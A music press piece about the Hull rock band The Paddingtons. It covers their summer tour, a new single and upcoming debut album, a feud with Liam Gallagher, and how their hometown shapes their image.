Restless after their longest hiatus from live shows in the last 8 months (just under 4 weeks!), The Paddingtons are back on the road in June & July, with a new single, '50 To A Ã'£' released on July 11th through Poptones/ Mercury, and the recording of their debut album under their belts (due for a September release). Hot on the heels of their No. 25 chart success with their 'Panic Attack' single at the start of May, and an infamous spat with Liam Gallagher - they sneeringly dedicated Loser & Keep Your Distance to him at their riotous 100 Club gig last month. 'Noel's a genius, but what does his fat, toothless vocalist know about youth culture?' wondered guitarist Josh Hubbard.

Last year all the bands emerging from The Libertines scene were lumped together. Now they've established their identities and marked out their territory. The Paddingtons have turned heads with their vicious hi-energy rock'n'roll sound, pure pop songs, good looks, and incendiary live shows. But they have also been marked out by virtue of where they hail from - Hull, East Yorks - rather than East London. Stuck out on a limb geographically, bombed to bits in the war and crippled by industrial decline, it's been saddled with a bad reputation - #1 in The Idlers Book of Crap Towns. And it's been hard for bands to break out of.
